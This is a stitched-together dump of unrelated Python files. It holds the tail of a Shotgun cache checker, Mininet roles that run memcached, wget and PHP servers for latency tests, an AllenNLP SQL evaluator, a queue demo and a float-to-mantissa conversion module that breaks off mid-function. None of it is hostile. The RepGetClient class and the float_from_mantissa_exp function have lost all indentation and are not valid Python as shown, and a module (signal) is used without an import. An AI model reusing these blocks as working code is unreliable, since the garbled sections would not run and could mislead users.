                ['id', 'greater_than', latestCachedEventID]
            ]
            LOG.debug("Getting Pending Event Log Entries for type: '{0}'".format(work['configType']))
            eventLogEntries = self.sg.find('EventLogEntry', eventLogFilters, ['event_type', 'id'])
            additions = len([e for e in eventLogEntries if 'New' in e['event_type'] or 'Revival' in e['event_type']])
            removals = len([e for e in eventLogEntries if 'Retirement' in e['event_type']])
            # Net number of entities Shotgun has that the cache hasn't seen yet.
            pendingDiff = additions - removals

            failed = sgCount - pendingDiff != cacheCount
            if failed:
                LOG.debug("'{0}' counts don't match, SG: {1} Cache: {2}".format(entityConfig.type, sgCount, cacheCount))
            else:
                LOG.debug("'{0}' counts match, SG: {1} Cache: {2}".format(entityConfig.type, sgCount, cacheCount))

            result = {
                'work': work,
                'entityType': work['configType'],
                'failed': failed,
                'sgCount': sgCount,
                'pendingEvents': len(eventLogEntries),
                'pendingDiff': pendingDiff,
                'cacheCount': cacheCount,
            }
            self.resultQueue.put(result)
            self.workQueue.task_done()
|
roles.py | #!/usr/bin/env python
"""
HostRole: superclass for all roles (single instance of an application)
running on a host.
ChromeClient: starts a chrome instance on the host
MemcacheServer: starts a memcached instance on the host on the default port
WgetClient: retrieves specified page from a specified server and averages
response time over specified number of trials
PhpServer: starts php server on a specified port using a specified
document root directory
PhpServerMemcacheClient: starts a php server as a memcached client, modifying
template php document to use specified memcached server(s) IP address(es)
"""
import os
import re
import subprocess
import sys
import threading
from time import time, sleep
from mininet.net import Mininet
from mininet.cli import CLI
import minidc.stats
def start(mn, *procs):
    """Initialize then start every role.

    BUG FIX: the original used map() purely for side effects; on Python 3
    map() is lazy, so the callbacks would never run.  Explicit loops behave
    identically on Python 2 and correctly on Python 3.  All init() calls
    still complete before any start() call, as before.
    The `mn` parameter is unused but kept for interface compatibility.
    """
    for p in procs:
        p.init()
    for p in procs:
        p.start()
def stop(*procs):
    """Stop every role.

    BUG FIX: replaces a side-effect-only map() (a no-op on Python 3, where
    map() is lazy) with an explicit loop.
    """
    for p in procs:
        p.stop()
class HostRole(object):
    """Superclass for all roles: a single application instance on a mininet host.

    Subclasses set ``self.procStr`` to the command line to run; stdout and
    stderr are redirected to per-host log files under /tmp.
    """
    def __init__(self, host):
        # Command line to execute; must be set by subclasses before start().
        self.procStr = None
        self.proc = None
        self.host = host
        self.stdout = "/tmp/{0}-{1}.log".format(host.IP(),
                                                self.__class__.__name__)
        self.stderr = "/tmp/{0}-{1}.err".format(host.IP(),
                                                self.__class__.__name__)

    def init(self):
        # Hook for one-time setup before start(); default is a no-op.
        pass

    def start(self):
        # Launch the role's process on the mininet host, logging to files.
        self.proc = self.host.popen(self.procStr,
                                    stdout=open(self.stdout, "wb"),
                                    stderr=open(self.stderr, "wb"))

    def stop(self):
        # subclasses can call proc.wait(), so proc may have already terminated
        try:
            self.proc.terminate()
        except Exception:
            pass

    def IP(self):
        # Convenience accessor for the underlying host's IP address.
        return self.host.IP()

    def __repr__(self):
        return self.__str__()
class EmptyRole(HostRole):
    """Placeholder role that runs nothing; for hosts without a workload."""
    def __init__(self, host, name="Empty"):
        super(EmptyRole, self).__init__(host)
        self.name = name

    def init(self):
        pass

    def start(self):
        pass

    def stop(self):
        pass

    def __str__(self):
        return self.name
class ChromeClient(HostRole):
    """Starts a Chrome browser instance on the host, pointed at a URL."""
    def __init__(self, host, url=None, datadir="./"):
        super(ChromeClient, self).__init__(host)
        # Per-host profile directory so concurrent instances don't clash.
        self.datadir = os.path.join(datadir, host.name + "-datadir")
        self.procStr = "/opt/google/chrome/google-chrome --enable-logging --v=1 --user-data-dir={0} {1}".format(self.datadir, url)

    def __str__(self):
        return "Chrome Client"
class MemcacheServer(HostRole):
    """Starts a memcached instance on the host (default port, user nobody)."""
    def __init__(self, host):
        super(MemcacheServer, self).__init__(host)
        self.procStr = "memcached -u nobody"

    def __str__(self):
        return "Memcached Server"
class WgetClient(HostRole):
    """Repeatedly fetches a URL with wget and averages response times.

    ``trials == -1`` means run until stop() is called.  With ``toFile=True``
    the page body is appended to the log file and parsed once at the end;
    otherwise it is captured via a pipe and parsed per request.
    """
    def __init__(self, host, url, trials=-1, toFile=False):
        super(WgetClient, self).__init__(host)
        self.trials = trials
        self.procStr = "wget -q -O - {0}".format(url)
        self.cont = True
        self.toFile = toFile

    def start(self):
        # Run the fetch loop on a background thread so start() doesn't block.
        thread = threading.Thread(target=self.threadStart)
        thread.start()

    def stop(self):
        super(WgetClient, self).stop()
        self.cont = False

    def threadStart(self):
        loadtimes = []
        rettimes = []
        i = 0
        while self.cont and (self.trials == -1 or i < self.trials):
            i += 1
            elapsed = time()
            if self.toFile:
                self.proc = self.host.popen(self.procStr,
                                            stdout=open(self.stdout, "ab+"),
                                            stderr=open(self.stderr, "ab+"))
                self.proc.wait()
            else:
                self.proc = self.host.popen(self.procStr,
                                            stdout=subprocess.PIPE,
                                            stderr=open(self.stderr, "ab+"))
                text = self.proc.communicate()[0]
            # save load time
            elapsed = time() - elapsed
            loadtimes.append(elapsed)
            if not self.toFile:
                # The fetched page is expected to contain a timing number;
                # take the first number found on the page.
                p = re.compile('\d*[.]?\d+')
                finds = p.findall(text)
                if len(finds) > 0:
                    rettimes.append(float(finds[0]))
                    minidc.stats.mcStats.add(self.host.name,
                                             float(finds[0]))
        if self.toFile:
            # parse output for memcache times
            lines = [line.strip() for line in open(self.stdout)]
            p = re.compile('\d*[.]?\d+')
            rettimes = []
            for line in lines:
                finds = p.findall(line)
                if len(finds) > 0:
                    rettimes.append(float(finds[0]))
        if len(rettimes) > 0:
            # Average object-retrieval time (as reported by the page) and
            # average page load time in milliseconds.
            retavg = (reduce(lambda x, y: x + y, rettimes) / len(rettimes))
            loadavg = (reduce(lambda x, y: x + y, loadtimes) / len(loadtimes)) * 1000
            print "{0}: Avg times - obj: {1}, load: {2}".format(self.IP(),
                                                                round(retavg, 3),
                                                                round(loadavg, 3))
            # print "\n****************************************************"
            # print "Average obj retrieval time:", round(retavg, 3), "ms"
            # print "Average load time:", round(loadavg, 3), "ms"
            # print "****************************************************\n"

    def __str__(self):
        return "Wget Client"
class PhpServer(HostRole):
    """Starts PHP's built-in web server on a given port and document root."""
    def __init__(self, host, wwwdir, port=80, page="index.php"):
        super(PhpServer, self).__init__(host)
        self.procStr = "sudo php -S {0}:{1} -t {2}".format(host.IP(),
                                                           port,
                                                           wwwdir)
        self.port = port
        self.page = page
        self.wwwdir = wwwdir

    def url(self):
        # Base URL of this server.
        return "http://{0}:{1}".format(self.host.IP(),
                                       self.port)

    def docUrl(self):
        # URL of the configured landing page.
        return "http://{0}:{1}/{2}".format(self.host.IP(),
                                           self.port,
                                           self.page)

    def __str__(self):
        return "PHP Server"
class PhpServerMemcacheClient(PhpServer):
    """PHP server acting as a memcached client.

    init() rewrites a template PHP document, replacing its ``addServer(...)``
    call with an ``addServers(...)`` call listing the configured memcached
    server address(es), and writes the result into the document root.
    """
    def __init__(self, host, wwwdir, mcSrvList=None, port=80, template=None, outFile="index.php"):
        super(PhpServerMemcacheClient, self).__init__(host, wwwdir, port, page=outFile)
        self.mcSrvList = mcSrvList
        self.outFile = outFile
        self.template = template

    def init(self):
        if self.template:
            # PHP literal: array(array('<ip>', 11211), ...) for addServers().
            srvs = "array(" + ",".join(["array('%s', 11211)" % s for s in self.mcSrvList]) + ")"
            php = ""
            f = open(self.template)
            lines = f.readlines()
            for l in lines:
                l = re.sub("addServer\(.*\)", "addServers(" + srvs + ")", l)
                php += l
            f.close()
            f = open(self.wwwdir + "/" + self.outFile, 'w+')
            f.write(php)
            f.close()

    def __str__(self):
        return "PHP Server (Memcached Client)"
class RepGetClient(HostRole):
def __init__(self, host, srvs, trials=-1, activeReps=None):
super(RepGetClient, self).__init__(host)
self.trials = trials
self.procStr = None
self.cont = True
self.srvs = srvs
self.host = host
self.lock = threading.Lock()
if activeReps is None:
self.activeReps = len(self.srvs)
else:
self.activeReps = activeReps
def start(self):
thread = threading.Thread(target=self.threadStart)
thread.start()
def stop(self):
self.cont = False
def execPhp(self, code):
proc = self.host.popen(['php'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=True)
output = proc.communicate(code)[0]
try:
os.kill(proc.pid, signal.SIGTERM)
except:
pass
return output
def setActiveReps(self, num):
self.lock.acquire()
try:
self.activeReps = num
print "{0}: using {1} replicated servers".format(self.host.name,
self.activeReps)
finally:
self.lock.release()
def threadStart(self):
rettimes = []
print "{0} using {1} replicas".format(self.host.name,
self.activeReps)
iters = 0
while self.cont and (self.trials == -1 or iters < self.trials):
iters += 1
self.lock.acquire()
try:
active = self.srvs[:self.activeReps]
finally:
self.lock.release()
threadtimes = [None] * len(active)
threads = [None] * len(active)
if True:
for i, h in enumerate(active):
threads[i] = threading.Thread(target=self.mcget,
args=(h, threadtimes, i))
threads[i].start()
for i in range(len(threads)):
threads[i].join()
# print threadtimes
minidc.stats.mcStats.add(self.host.name,
round(max(threadtimes) * 1000, 3))
# save some CPU cycles, throttle memcache requests
sleep(0.2)
def mcget(self, srv, result, index):
code = "<?php $mem = new Memcached();\n"
code += "$mem->addServer(\"" + srv + "\", 11211);\n"
code += """$time_start = microtime(true);
$result = $mem->get("blah");
if ($result) {
//echo "Item retrieved from memcached";
} else {
//echo "No matching key, adding";
$mem->set("blah", "blah", 3600) or die("Couldn't save to mc");
}
$time_end = microtime(true);
$time = $time_end - $time_start;
//$time = round($time * 1000, 3);
echo "\r\n$time";
?>"""
res = self.execPhp(code)
try:
elapsed = float(res)
except:
elapsed = -1
result[index] = elapsed
def __str__(self):
    """Human-readable name used by log/status output."""
    return "Replicated Memcached Client"
|
sql_executor.py | import logging
from typing import List
import sqlite3
import multiprocessing
from multiprocessing import Process
from allennlp.common.file_utils import cached_path
logger = logging.getLogger(__name__)
MULTIPROCESSING_LOGGER = multiprocessing.get_logger()
class SqlExecutor:
    """
    This class evaluates SQL queries by connecting to a SQLite database. Because SQLite is disk-based
    we just need to provide one file with the location. We execute the predicted SQL query and the labeled
    queries against the database and check if they execute to the same table.
    """

    def __init__(self, database_file: str) -> None:
        # Initialize a cursor to our sqlite database, so we can execute SQL queries for denotation accuracy.
        self._database_file = cached_path(database_file)
        self._connection = sqlite3.connect(self._database_file)
        self._cursor = self._connection.cursor()

    def evaluate_sql_query(self, predicted_sql_query: str, sql_query_labels: List[str]) -> int:
        """
        Return 1 if the predicted query evaluates to the same table as any of
        the labeled queries, otherwise 0 (including errors and timeouts).
        """
        # We set the logging level for the subprocesses to warning, otherwise, it will
        # log every time a process starts and stops.
        MULTIPROCESSING_LOGGER.setLevel(logging.WARNING)

        # Since the query might hang, we run in another process and kill it if it
        # takes too long. The subprocess reports its verdict via its exit code.
        process = Process(
            target=self._evaluate_sql_query_subprocess, args=(predicted_sql_query, sql_query_labels)
        )
        process.start()

        # If the query has not finished in 3 seconds then we will proceed.
        process.join(3)
        denotation_correct = process.exitcode  # type: ignore
        if process.is_alive():
            logger.warning("Evaluating query took over 3 seconds, skipping query")
            process.terminate()
            process.join()

        # exitcode is None while the process is alive (i.e. on timeout).
        if denotation_correct is None:
            denotation_correct = 0

        return denotation_correct

    def _evaluate_sql_query_subprocess(
        self, predicted_query: str, sql_query_labels: List[str]
    ) -> int:
        """
        We evaluate here whether the predicted query and the query label evaluate to the
        exact same table. This method is only called by the subprocess, so we just exit with
        1 if it is correct and 0 otherwise.
        """
        import sys  # local import; sys.exit is clearer/safer than builtin exit()

        postprocessed_predicted_query = self.postprocess_query_sqlite(predicted_query)

        try:
            self._cursor.execute(postprocessed_predicted_query)
            predicted_rows = self._cursor.fetchall()
        except sqlite3.Error as error:
            logger.warning(f"Error executing predicted: {error}")
            sys.exit(0)

        # If predicted table matches any of the reference tables then it is counted as correct.
        target_rows = None
        for sql_query_label in sql_query_labels:
            postprocessed_sql_query_label = self.postprocess_query_sqlite(sql_query_label)
            try:
                self._cursor.execute(postprocessed_sql_query_label)
                target_rows = self._cursor.fetchall()
            except sqlite3.Error as error:
                # BUG FIX: this message said "Error executing predicted",
                # masking which side actually failed.
                logger.warning(f"Error executing label: {error}")
            if predicted_rows == target_rows:
                sys.exit(1)
        sys.exit(0)

    @staticmethod
    def postprocess_query_sqlite(query: str):
        # The dialect of SQL that SQLite takes is not exactly the same as the labeled data.
        # We strip off the parentheses that surround the entire query here, and
        # re-terminate the unwrapped query with ';'.
        query = query.strip()
        if query.startswith("("):
            return query[1 : query.rfind(")")] + ";"
        return query
|
test_joinablequeue_example_default.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# @autor: Ramón Invarato Menéndez
# @version 1.0
import threading
from quick_queue.quick_queue import QJoinableQueue
"""
Execute this script to see result in console
Add some values to qJoinQueue
Code example from https://docs.python.org/3/library/queue.html#queue.Queue.join
"""
qjq = QJoinableQueue()


def worker():
    """Consume items from qjq forever, acknowledging each with task_done()."""
    print("Worker")
    while True:
        item = qjq.get()
        print(f'Working on {item}')
        print(f'Finished {item}')
        qjq.task_done()


# The consumer is a daemon so the script exits once join() returns.
threading.Thread(target=worker, daemon=True).start()

# Queue thirty work items for the consumer.
for n in range(30):
    qjq.put(n)
print('All task requests sent\n', end='')

# Wait until every queued item has been acknowledged.
qjq.join()
print('All work completed')
|
conversion.py | """Conversions between some common numeric types (float, np.floatXX) and
universal m/exp notation.
"""
import sys
import math
import numpy as np
import gmpy2 as gmp
mpfr_t = type(gmp.mpfr())  # gmpy2 does not export the mpfr type directly
from .integral import bitmask

# reusable definitions
# Rounding-mode identifiers used throughout this package (IEEE 754-style).
ROUND_NEAREST_EVEN = 1
ROUND_NEAREST_AWAY = 2
ROUND_UP = 3
ROUND_DOWN = 4
ROUND_TO_ZERO = 5
ROUND_AWAY_FROM_ZERO = 6
def _np_byteorder(ftype):
    """Converts from numpy byteorder conventions for a floating point datatype
    to sys.byteorder 'big' or 'little'.
    """
    bo = np.dtype(ftype).byteorder
    translation = {'=': sys.byteorder, '<': 'little', '>': 'big'}
    if bo in translation:
        return translation[bo]
    raise ValueError('unknown numpy byteorder {} for dtype {}'.format(repr(bo), repr(ftype)))
# Mini format datasheet.
# For all formats:
# emax = (1 << (w - 1)) - 1
# emin = 1 - emax
# n = emin - p
def fdata(ftype):
    """Return the IEEE 754 parameters of a float datatype as a dict.

    Keys: w (exponent bits), p (precision incl. hidden bit), emax/emin
    (normal exponent range), n (exponent below the smallest subnormal,
    n = emin - p), pbits (stored mantissa bits), nbytes (total storage).

    Raises:
        ValueError: for np.float128 (machine-dependent longdouble).
        TypeError: for anything that is not float or np.float{16,32,64}.
    """
    if ftype == np.float16:
        return {
            'w' : 5,
            'p' : 11,
            'emax' : 15,
            'emin' : -14,
            'n' : -25,
            'pbits' : 10,
            'nbytes' : 2,
        }
    elif ftype == np.float32:
        return {
            'w' : 8,
            'p' : 24,
            'emax' : 127,
            'emin' : -126,
            'n' : -150,
            'pbits' : 23,
            'nbytes' : 4,
        }
    elif ftype == np.float64 or ftype == float:
        return {
            'w' : 11,
            'p' : 53,
            'emax' : 1023,
            'emin' : -1022,
            'n' : -1075,
            'pbits' : 52,
            'nbytes' : 8,
        }
    elif ftype == getattr(np, 'float128', None):
        # getattr: np.float128 does not exist on all platforms (e.g. Windows)
        raise ValueError('unsupported: machine-dependent 80-bit longdouble')
    else:
        # BUG FIX: the original constructed this TypeError but never raised
        # it, silently returning None for unknown types.
        raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(ftype)))
# Get status flags out of numeric types
def is_neg(f):
    """Get the sign bit of a float or mpfr."""
    if isinstance(f, mpfr_t):
        if gmp.is_zero(f):
            #TODO: this is terrible
            # gmp.sign() reports 0 for both +0 and -0, so fall back to the
            # printed representation to recover the sign of a zero.
            return str(f).startswith('-')
        elif gmp.is_nan(f):
            raise ValueError('mpfr NaNs are unsigned')
        else:
            return gmp.sign(f) < 0
    else:
        # NOTE: np.float64 subclasses float, so the float branch must stay
        # first; both use the 64-bit layout (sign bit at offset 63).
        if isinstance(f, float):
            f = np.float64(f)
            offset = 63
        elif isinstance(f, np.float16):
            offset = 15
        elif isinstance(f, np.float32):
            offset = 31
        elif isinstance(f, np.float64):
            offset = 63
        else:
            raise TypeError('expected mpfr, float, or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
        # Reinterpret the raw IEEE bytes as an int and test the top bit.
        bits = int.from_bytes(f.tobytes(), _np_byteorder(type(f)))
        return bits >> offset != 0
def is_inf(f):
    """Check whether a float or mpfr is inf or -inf."""
    if isinstance(f, mpfr_t):
        return gmp.is_inf(f)
    if isinstance(f, float):
        return math.isinf(f)
    if isinstance(f, (np.float16, np.float32, np.float64)):
        return np.isinf(f)
    raise TypeError('expected mpfr, float, or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
def is_nan(f):
    """Check whether a float or mpfr is nan."""
    if isinstance(f, mpfr_t):
        return gmp.is_nan(f)
    if isinstance(f, float):
        return math.isnan(f)
    if isinstance(f, (np.float16, np.float32, np.float64)):
        return np.isnan(f)
    raise TypeError('expected mpfr, float, or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
# Other non-real properties of numeric types
def float_to_payload(f):
    """Get the integer payload of a float that is NaN."""
    # pbits = stored mantissa bits per format; float must be tested before
    # the numpy types because np.float64 subclasses float.
    if isinstance(f, float):
        pbits = 52
        f = np.float64(f)
    elif isinstance(f, np.float16):
        pbits = 10
    elif isinstance(f, np.float32):
        pbits = 23
    elif isinstance(f, np.float64):
        pbits = 52
    else:
        raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
    if not np.isnan(f):
        raise ValueError('expecting NaN, got {}'.format(repr(f)))
    # The payload is the mantissa field of the NaN's raw encoding.
    bits = int.from_bytes(f.tobytes(), _np_byteorder(type(f)))
    return bits & bitmask(pbits)
# Conversions to and from mantissa / exponent form
def float_to_mantissa_exp(f):
    """Converts a python or numpy float into universal m, exp representation:
    f = m * 2**e. If the float does not represent a real number (i.e. it is inf
    or NaN) this will raise an exception.
    """
    # Per-format constants: w exponent bits, bias emax, pbits stored mantissa
    # bits. float must stay first: np.float64 subclasses float.
    if isinstance(f, float):
        w = 11
        emax = 1023
        pbits = 52
        f = np.float64(f)
    elif isinstance(f, np.float16):
        w = 5
        emax = 15
        pbits = 10
    elif isinstance(f, np.float32):
        w = 8
        emax = 127
        pbits = 23
    elif isinstance(f, np.float64):
        w = 11
        emax = 1023
        pbits = 52
    else:
        raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
    # Split the raw IEEE 754 encoding into sign / biased exponent / mantissa.
    bits = int.from_bytes(f.tobytes(), _np_byteorder(type(f)))
    S = bits >> (w + pbits) & bitmask(1)
    E = bits >> (pbits) & bitmask(w)
    C = bits & bitmask(pbits)
    e = E - emax
    if E == 0:
        # subnormal: no hidden bit; exponent pinned at emin - pbits
        if S == 0:
            m = C
        else:
            m = -C
        exp = -emax - pbits + 1
    elif e <= emax:
        # normal: restore the hidden leading 1 bit
        if S == 0:
            m = C | (1 << pbits)
        else:
            m = -(C | (1 << pbits))
        exp = e - pbits
    else:
        # nonreal: exponent field all ones (inf or NaN)
        raise ValueError('nonfinite value {}'.format(repr(f)))
    return m, exp
def float_from_mantissa_exp(m, exp, ftype=float):
"""Converts universal m, exp representation into a python or numpy
float according to ftype.
TODO: this implementation is incapable of rounding: if it is not given
enough precision, it will complain to stdout, and if it is given too much,
it will raise an exception rather than trying to round.
"""
if ftype == float:
w = 11
p = 53
emax = 1023
emin = -1022
pbits = 52
nbytes = 8
elif ftype == np.float16:
w = 5
p = 11
emax = 15
emin = -14
pbits = 10
nbytes = 2
elif ftype == np.float32:
w = 8
p = 24
emax = 127
emin = -126
pbits = 23
nbytes = 4
elif ftype == np.float64:
w = 11
p = 53
emax = 1023
emin = -1022
pbits = 52
nbytes = 8
else:
raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(ftype)))
if m >= 0:
S = 0
c = m
else:
S = 1
c = -m
cbits = c.bit_length()
e = exp + cbits - 1
if e < emin:
# subnormal
lz = (emin - 1) - e
if lz > pbits or (lz == pbits and cbits > 0):
raise ValueError('exponent out of range: {}'.format(e))
elif lz + cbits > pbits:
raise ValueError('too much precision: given {}, can represent {}'.format(cbits, pbits - lz))
E = 0
C = c << (lz - (pbits - cbits))
elif e <= emax:
# normal
if cbits > p:
raise ValueError('too much precision: given {}, can represent {}'.format(cbits, p))
elif cbits < p:
print('Warning: inventing {} low order bits!'.format(p - cbits))
E = e + emax
C = (c << (p - cbits)) & bitmask(pbits)
else:
# overflow
raise ValueError('exponent out of range: {}'.format(e))
f = np.frombuffer(
((S << (w + pbits)) | (E << pbits) | C).to_bytes(nbytes, _np_byteorder(ftype)),
dtype=ftype, count=1, offset=0,
)[0]
if ftype == float:
return float(f)
else:
return f
def float64_from_mantissa_exp(m, exp):
    """Convenience wrapper: float_from_mantissa_exp targeting np.float64."""
    return float_from_mantissa_exp(m, exp, np.float64)
def float32_from_mantissa_exp(m, exp):
    """Convenience wrapper: float_from_mantissa_exp targeting np.float32."""
    return float_from_mantissa_exp(m, exp, np.float32)
def float16_from_mantissa_exp(m, exp):
    """Convenience wrapper: float_from_mantissa_exp targeting np.float16."""
    return float_from_mantissa_exp(m, exp, np.float16)
def mpfr_to_mantissa_exp(f):
    """Convert a gmpy2 mpfr to universal (m, exp): f = m * 2**e.

    Identical to f.as_mantissa_exp() for real numbers (non-real values make
    as_mantissa_exp raise), except that the gmpy2.mpz results are coerced to
    plain python ints.
    """
    mantissa, exponent = f.as_mantissa_exp()
    return int(mantissa), int(exponent)
def mpfr_from_mantissa_exp(m, exp):
    """Converts universal m, exp representation into a gmpy2 mpfr. The mpfr will
    always reflect the inherent precision of m and exp, unless m is fewer than 2 bits
    long, in which case the resulting mpfr will have a precision of 2.
    """
    mbits = m.bit_length()
    ebits = exp.bit_length()
    # Apparently a multiplication between a small precision 0 and a huge
    # scale can raise a Type error indicating that gmp.mul() requires two
    # mpfr arguments - we can avoid that case entirely by special-casing
    # away the multiplication.
    if mbits == 0:
        # m == 0: result is exactly zero; a minimal trapping context suffices
        # (mpfr precision cannot go below 2).
        with gmp.context(
                precision=2,
                emin=-1,
                emax=1,
                trap_underflow=True,
                trap_overflow=True,
                trap_inexact=True,
                trap_invalid=True,
                trap_erange=True,
                trap_divzero=True,
        ):
            return gmp.mpfr(0)
    else:
        # Build the scale 2**exp in a context just wide enough to hold it
        # exactly; all traps enabled so any rounding raises instead of
        # silently losing bits.
        with gmp.context(
                precision=max(2, ebits),
                emin=min(-1, exp),
                emax=max(1, ebits, exp + 1),
                trap_underflow=True,
                trap_overflow=True,
                trap_inexact=True,
                trap_invalid=True,
                trap_erange=True,
                trap_divzero=True,
        ):
            scale = gmp.exp2(exp)
        # Convert the mantissa at its own precision and multiply; the
        # exponent range must cover m * 2**exp, hence exp + mbits.
        with gmp.context(
                precision=max(2, mbits),
                emin=min(-1, exp),
                emax=max(1, mbits, exp + mbits),
                trap_underflow=True,
                trap_overflow=True,
                trap_inexact=True,
                trap_invalid=True,
                trap_erange=True,
                trap_divzero=True,
        ):
            c = gmp.mpfr(m)
            return gmp.mul(c, scale)
def numeric_to_mantissa_exp(x):
    """Convert any type that can be interpreted as a number to universal
    m, exp representation: x = m * 2**e.
    """
    if isinstance(x, int):
        return (x, 0)
    if isinstance(x, (float, np.float16, np.float32, np.float64)):
        return float_to_mantissa_exp(x)
    if isinstance(x, mpfr_t):
        return mpfr_to_mantissa_exp(x)
    raise TypeError('{}: not a numeric type'.format(repr(x)))
def numeric_to_signed_mantissa_exp(x):
    """Convert any type that can be interpreted as a number to universal
    sign, m, exp representation: x = m * 2**e, with an explicit sign so
    that the sign of floating point zeros is not lost.
    """
    if isinstance(x, int):
        return (x < 0, abs(x), 0)
    if isinstance(x, (float, np.float16, np.float32, np.float64)):
        m, exp = float_to_mantissa_exp(x)
        return (is_neg(x), abs(m), exp)
    if isinstance(x, mpfr_t):
        m, exp = mpfr_to_mantissa_exp(x)
        return (is_neg(x), abs(m), exp)
    raise TypeError('{}: not a numeric type'.format(repr(x)))
# Some basic tests
# denormal numbers will puke out more precision than they really have;
# this is harmless for correctness testing, as all we're going to do
# is compare things for exact equality
def _float_to_mpfr(f):
    """Convert a float to an mpfr configured with that format's precision and
    exponent range; all traps are enabled so the conversion is exact or raises.
    """
    # float must be tested before the numpy types (np.float64 subclasses
    # float). n is the subnormal-inclusive minimum exponent; the context
    # receives emin=n, so the local `emin` is informational only.
    if isinstance(f, float):
        p = 53
        n = -1075
        emin = -1022
        emax = 1024 # emax + 1
    elif isinstance(f, np.float16):
        p = 11
        n = -25
        emin = -14
        emax = 16 # emax + 1
        f = float(f)
    elif isinstance(f, np.float32):
        p = 24
        n = -150
        emin = -126
        emax = 128 # emax + 1
        f = float(f)
    elif isinstance(f, np.float64):
        p = 53
        n = -1075
        emin = -1022
        emax = 1024 # emax + 1
        f = float(f)
    else:
        raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
    with gmp.context(
            precision=p,
            emin=n,
            emax=emax,
            trap_underflow=True,
            trap_overflow=True,
            trap_inexact=True,
            trap_invalid=True,
            trap_erange=True,
            trap_divzero=True,
    ):
        return gmp.mpfr(f)
# always use precision of doubles (math.frexp is for doubles anyway)
def _mpfr_from_frexp(fraction, exponent):
    """Build an mpfr from a math.frexp pair at double precision.

    Always uses the precision of doubles (math.frexp is for doubles anyway).
    """
    with gmp.context(
            precision=53,
            emin=-1075,
            emax=1025, # emax + 2
            trap_underflow=True,
            trap_overflow=True,
            trap_inexact=True,
            trap_invalid=True,
            trap_erange=True,
            trap_divzero=True,
    ):
        return gmp.mul(gmp.mpfr(fraction), gmp.exp2(exponent))
def _check_agreement(i, ftype):
    """Round-trip the raw bit-pattern *i* as an *ftype* through every
    conversion path in this module, printing any disagreement (silence
    means agreement)."""
    if ftype == float:
        nbytes = 8
    elif ftype == np.float16:
        nbytes = 2
    elif ftype == np.float32:
        nbytes = 4
    elif ftype == np.float64:
        nbytes = 8
    else:
        # BUG FIX: the original formatted this with repr(type(f)), but f is
        # not assigned yet at this point -- it raised NameError instead of
        # the intended TypeError.
        raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(ftype)))
    try:
        f = np.frombuffer(i.to_bytes(nbytes, _np_byteorder(ftype)), dtype=ftype, count=1, offset=0)[0]
        if np.isinf(f) or np.isnan(f):
            # raise OverflowError('not a real number: {}'.format(f))
            return # TODO: this could do something
        if ftype == float:
            f = float(f)
        m, exp = float_to_mantissa_exp(f)
        f1 = float_from_mantissa_exp(m, exp, ftype)
        r = mpfr_from_mantissa_exp(m, exp)
        r1 = _float_to_mpfr(f)
        r2 = _mpfr_from_frexp(*math.frexp(f))
        m1, exp1 = mpfr_to_mantissa_exp(r)
        errs = ''
        if not (f == f1):
            # fixed: this message was missing its trailing newline
            errs += ' f failed to round trip through m, exp: {} = {}\n'.format(f, f1)
        if not (m == m1 and exp == exp1):
            if m == 0:
                pass # IEEE 754 floats report small exponents for 0 (smaller than smallest denorm...), while mpfr reports 1
            elif abs(m) == 1 and abs(m1) == 2 and exp1 == exp - 1:
                pass # The smallest denorm has less than 2 precision, which mpfr can't represent
            else:
                errs += ' m, exp failed to round trip through mpfr: {} = {}, {} = {}\n'.format(m, m1, exp, exp1)
        if not r == r1 == r2:
            errs += ' mpfr forms disagree: {} = {} = {}\n'.format(repr(r), repr(r1), repr(r2))
        if errs != '':
            print('disagreement on {}, {}, {}'.format(i, ftype, f))
            print(errs)
    except Exception as e:
        print('Unexpected exception on {}, {}'.format(i, ftype))
        raise e
def _test():
    """Self-test of the float <-> (m, exp) <-> mpfr conversions: exhaustive
    for float16, randomized for the wider formats. Prints disagreements;
    silence (other than the banners) means success."""
    import random
    print('Watch for output ...')
    print('-- testing all np.float16 --')
    for i in range(1 << 16):
        _check_agreement(i, np.float16)
    tests = 1 << 20
    n32 = tests
    n64 = tests
    nfloat = tests
    print('-- testing {} np.float32 --'.format(n32))
    imax = bitmask(32)
    for i in range(n32):
        _check_agreement(random.randint(0, imax), np.float32)
    print('-- testing {} np.float64 --'.format(n64))
    imax = bitmask(64)
    for i in range(n64):
        _check_agreement(random.randint(0, imax), np.float64)
    print('-- testing {} float --'.format(nfloat))
    imax = bitmask(64)
    for i in range(nfloat):
        # BUG FIX: this pass previously tested np.float64 again; the banner
        # (and the separate nfloat count) intend the builtin float path.
        _check_agreement(random.randint(0, imax), float)
    print('... Done.')
# this consumes many cores and takes cpu-days
def _test_all_fp32(ncores=None):
    """Exhaustively check every 32-bit pattern, split evenly across worker
    processes (defaults to one per CPU). Consumes many cores and takes
    cpu-days."""
    import multiprocessing
    if ncores is None:
        ncores = multiprocessing.cpu_count()
    total = 1 << 32
    blocksize = total // ncores
    workers = []
    for n in range(ncores):
        start = n * blocksize
        # the last worker absorbs the remainder of the range
        end = (n + 1) * blocksize if n < ncores - 1 else total
        workers.append(multiprocessing.Process(target=_test_all_fp32_between,
                                               args=(start, end)))
    print('Watch for output ...')
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    print('... Done.')
def _test_all_fp32_between(start, end):
    """Check every integer bit-pattern in [start, end) as an np.float32,
    printing a progress dot roughly every 1% of the range."""
    print('-- testing all np.float32 from {} to {} --'.format(start, end))
    ndots = 100 # per core
    # BUG FIX: guard against ranges smaller than ndots, where the original
    # computed mod == 0 and crashed with ZeroDivisionError on `i % mod`.
    mod = max(1, (end - start) // ndots)
    output_on = mod - 1
    for i in range(start, end):
        _check_agreement(i, np.float32)
        if i % mod == output_on:
            print('.', end='', flush=True)
def _test_big_mpfrs():
    """Fuzz mpfr_from_mantissa_exp / mpfr_to_mantissa_exp round-tripping with
